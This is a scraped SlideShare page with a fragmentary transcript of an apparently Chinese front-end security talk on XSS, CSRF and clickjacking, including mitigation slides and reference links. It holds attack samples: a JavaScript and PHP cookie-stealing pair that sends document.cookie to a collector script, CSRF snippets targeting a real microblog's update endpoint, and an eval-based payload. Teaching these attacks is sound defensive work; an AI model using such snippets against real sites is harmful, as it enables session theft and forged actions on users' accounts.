F2e security
Upcoming SlideShare
Loading in...5
×
 

F2e security

on

  • 2,061 views

 

Statistics

Views

Total Views
2,061
Views on SlideShare
1,947
Embed Views
114

Actions

Likes
17
Downloads
201
Comments
0

3 Embeds 114

http://yinjun622.sinaapp.com 61
http://wiki.ued.taobao.net 52
http://webcache.googleusercontent.com 1

Accessibility

Categories

Upload Details

Uploaded via as Adobe PDF

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

F2e security F2e security Presentation Transcript

  • 2
  • 3
  • 4
  • • – – –••
  • Cross-site scripting XSS
  • XSS
  • • Cookie• DOM••…
  • Yupoo XSS
  • alert
  • Javascriptvar img = new Image();img.src = get_cookie.php?var=+encodeURI(document.cookie); PHP<?phpif (isset($_GET[var])) { file_put_contents(./cookie/.time()..txt,urldecode($_GET[var]));}
  • “ ”
  • • Filter input,Escape output• Cookie• noscript?
  • ••
  • • http://en.wikipedia.org/wiki/Cross-site_scripting• http://www.gracecode.com/archives/2517• http://www.gracecode.com/archives/2491• http://ha.ckers.org/xss.html• http://www.xssed.com/
  • CSRF Cross Site Request Forgery
  • <img src=“http://.../del.php?id=64” />
  • <form action="http://jiwai.de/wo/status/update" method="post"> <textarea name="jw_status"></textarea> <input type="submit" /> </form>
  • •• GET POST•
  • setInterval(function() { var img = new Image(); var message = ; var api = http://jiwai.de/wo/status/ update; img.src = api + ?jw_status= + message + &t= + +new Date();}, 1000);
  • “ ”
  • • GET POST Cookie• Referer• Token•
  • • _tb_token_• Referer
  • • http://en.wikipedia.org/wiki/Cross-site_request_forgery• http://www.cgisecurity.com/csrf-faq.html• http://www.80sec.com/csrf-securit.html• http://www.playhack.net/view.php?id=31
  • Twitter Clickjacking
  • 1. iframe Twitter 02. “ ”3. Twitter
  • ••
  • CSRF
  • Cookie Session
  • • “JS ”••
  • Q&A
  • alert(/tHx/).replace(/.+/, eval);